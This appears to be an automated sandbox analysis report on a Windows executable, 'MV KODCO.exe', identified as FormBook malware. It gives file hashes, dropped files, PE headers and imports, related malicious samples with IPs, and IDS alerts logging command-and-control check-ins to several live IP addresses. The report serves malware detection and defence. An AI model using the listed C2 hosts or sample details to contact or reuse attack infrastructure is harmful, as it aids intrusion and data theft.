                                                        https://ambir.com/all-ambir-drivers/Get hashmaliciousUnknownBrowse
                                                        • 52.223.40.198
                                                        HZ1ZzlIpm7.vbeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        VNPT-AS-VNVNPTCorpVNPO 20495088.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.46.205
                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        protected.ps1Get hashmaliciousUnknownBrowse
                                                        • 202.92.4.57
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                        • 14.186.221.243
                                                        yakuza.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 14.248.237.190
                                                        http://weststoneltd.technolutionszzzz.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 203.161.41.21
                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                        • 113.189.0.97
                                                        ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 14.248.199.46
                                                        No context
                                                        No context
                                                        Process:C:\Windows\SysWOW64\ktmutil.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\MV KODCO.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288256
                                                        Entropy (8bit):7.994727250341813
                                                        Encrypted:true
                                                        SSDEEP:6144:ipQWiJKRJLvcV9ANT9HX9HNirqa1pFqA5bk2JYomPjbYkqp/wnDp3BDI:ipGCxvhT9Sqsp/5bXJYomYkYoN3u
                                                        MD5:9314DD564AFC5664FC5DDFE5E1256F56
                                                        SHA1:8A26EE10ACC34049AA9052C0F7B508D5BFD590C0
                                                        SHA-256:8075004FA1488F2ACBDF454F13A5746DC85452A76F46DC475289725D6FC45BEE
                                                        SHA-512:9236D64E6D20AA62970E40223A8EB96B608629921062596454C78664876A434900C7952CF894181683D93601CC92881E66BBD00C7CB5BF7F7721F8444C696EA0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..u`.X5MR...=......TO.p6E...A46U6S8CTL02XX5MRB5A46U6S8CTL0.XX5CM.;A.?...9..mdZ1+.= -R3U[uU2V-;8.P=xG8<b\/.r.esU,0).?UR.MRB5A46,7Z.~4+..8?.p2%.[....3_.N..d8R.H..V2..Q <qPU.X5MRB5A4f.6StBUL...95MRB5A46.6Q9HUG02.\5MRB5A46U.G8CT\02X(1MRBuA4&U6S:CTJ02XX5MRD5A46U6S83PL00XX5MRB7At.U6C8CDL02XH5MBB5A46U&S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46{B6@7TL0..\5MBB5A`2U6C8CTL02XX5MRB5A.6UVS8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A
                                                        Process:C:\Users\user\Desktop\MV KODCO.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288256
                                                        Entropy (8bit):7.994727250341813
                                                        Encrypted:true
                                                        SSDEEP:6144:ipQWiJKRJLvcV9ANT9HX9HNirqa1pFqA5bk2JYomPjbYkqp/wnDp3BDI:ipGCxvhT9Sqsp/5bXJYomYkYoN3u
                                                        MD5:9314DD564AFC5664FC5DDFE5E1256F56
                                                        SHA1:8A26EE10ACC34049AA9052C0F7B508D5BFD590C0
                                                        SHA-256:8075004FA1488F2ACBDF454F13A5746DC85452A76F46DC475289725D6FC45BEE
                                                        SHA-512:9236D64E6D20AA62970E40223A8EB96B608629921062596454C78664876A434900C7952CF894181683D93601CC92881E66BBD00C7CB5BF7F7721F8444C696EA0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..u`.X5MR...=......TO.p6E...A46U6S8CTL02XX5MRB5A46U6S8CTL0.XX5CM.;A.?...9..mdZ1+.= -R3U[uU2V-;8.P=xG8<b\/.r.esU,0).?UR.MRB5A46,7Z.~4+..8?.p2%.[....3_.N..d8R.H..V2..Q <qPU.X5MRB5A4f.6StBUL...95MRB5A46.6Q9HUG02.\5MRB5A46U.G8CT\02X(1MRBuA4&U6S:CTJ02XX5MRD5A46U6S83PL00XX5MRB7At.U6C8CDL02XH5MBB5A46U&S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46{B6@7TL0..\5MBB5A`2U6C8CTL02XX5MRB5A.6UVS8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A46U6S8CTL02XX5MRB5A
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.148032130107601
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:MV KODCO.exe
                                                        File size:1'214'976 bytes
                                                        MD5:864eeb9f741f971ef200951018a042a2
                                                        SHA1:91d4083caed9945d7c5fa70034cfe1b4d61a990c
                                                        SHA256:35c31002aa17d39dc34b9268f9a58968e4d7b530c3cc0d5076f4633e0a338be4
                                                        SHA512:7dc18fe7161d95d85ec54d331276560704ca376714a64d7d499b51d1bf436340a0101db6a70d6e9bc41141585fa1228d50982f9a1fd2e055175f04883cd9cc57
                                                        SSDEEP:24576:htb20pkaCqT5TBWgNQ7aZd85wv5Wr+Mqh4uv0Z7uBW6A:yVg5tQ7aZ2OvkwMZig5
                                                        TLSH:0045D01273DD8361C3B25273BA26B741AEBF782506B5F96B2FD4093DE920122521E773
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x425f74
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x673BCC77 [Mon Nov 18 23:23:35 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                        Instruction
                                                        call 00007FA000843D5Fh
                                                        jmp 00007FA000836D74h
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007FA000836EFAh
                                                        cmp edi, eax
                                                        jc 00007FA00083725Eh
                                                        bt dword ptr [004C0158h], 01h
                                                        jnc 00007FA000836EF9h
                                                        rep movsb
                                                        jmp 00007FA00083720Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007FA0008370C4h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007FA000836F00h
                                                        bt dword ptr [004BA370h], 01h
                                                        jc 00007FA0008373D0h
                                                        bt dword ptr [004C0158h], 00000000h
                                                        jnc 00007FA00083709Dh
                                                        test edi, 00000003h
                                                        jne 00007FA0008370AEh
                                                        test esi, 00000003h
                                                        jne 00007FA00083708Dh
                                                        bt edi, 02h
                                                        jnc 00007FA000836EFFh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007FA000836F03h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007FA000836F55h
                                                        bt esi, 03h
                                                        jnc 00007FA000836FA8h
                                                        movdqa xmm1, dqword ptr [esi+00h]
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2012 UPD4 build 61030
                                                        • [RES] VS2012 UPD4 build 61030
                                                        • [LNK] VS2012 UPD4 build 61030
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f81c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0xc40000x5f81c0x5fa00946a2e330659e722a3b0d369a40c0d6fFalse0.9304202410130719data7.9020547215243155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                        RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                        RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                        RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                        RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                        RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                        RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                        RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                        RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                        RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                        RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                        RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                        RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                        RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                        RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                        RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                        RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                        RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                        RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                        RT_RCDATA0xcc7b80x56b21data1.0003266639444672
                                                        RT_GROUP_ICON0x1232dc0x76dataEnglishGreat Britain0.6610169491525424
                                                        RT_GROUP_ICON0x1233540x14dataEnglishGreat Britain1.25
                                                        RT_GROUP_ICON0x1233680x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x12337c0x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x1233900xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x12346c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                        DLLImport
                                                        WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                        USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                        GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                        ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                        OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-19T03:24:44.213139+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449742154.92.61.3780TCP
                                                        2024-11-19T03:24:44.213139+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449742154.92.61.3780TCP
                                                        2024-11-19T03:25:00.066293+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497493.33.130.19080TCP
                                                        2024-11-19T03:25:02.606408+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497603.33.130.19080TCP
                                                        2024-11-19T03:25:05.151591+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497713.33.130.19080TCP
                                                        2024-11-19T03:25:07.708143+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497863.33.130.19080TCP
                                                        2024-11-19T03:25:07.708143+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497863.33.130.19080TCP
                                                        2024-11-19T03:25:13.673163+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449814203.161.49.19380TCP
                                                        2024-11-19T03:25:16.255654+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449825203.161.49.19380TCP
                                                        2024-11-19T03:25:18.865756+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449840203.161.49.19380TCP
                                                        2024-11-19T03:25:21.437279+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449852203.161.49.19380TCP
                                                        2024-11-19T03:25:21.437279+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449852203.161.49.19380TCP
                                                        2024-11-19T03:25:27.270615+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498783.33.130.19080TCP
                                                        2024-11-19T03:25:29.826729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498923.33.130.19080TCP
                                                        2024-11-19T03:25:32.373428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499033.33.130.19080TCP
                                                        2024-11-19T03:25:34.924642+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4499153.33.130.19080TCP
                                                        2024-11-19T03:25:34.924642+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4499153.33.130.19080TCP
                                                        2024-11-19T03:25:40.747620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499423.33.130.19080TCP
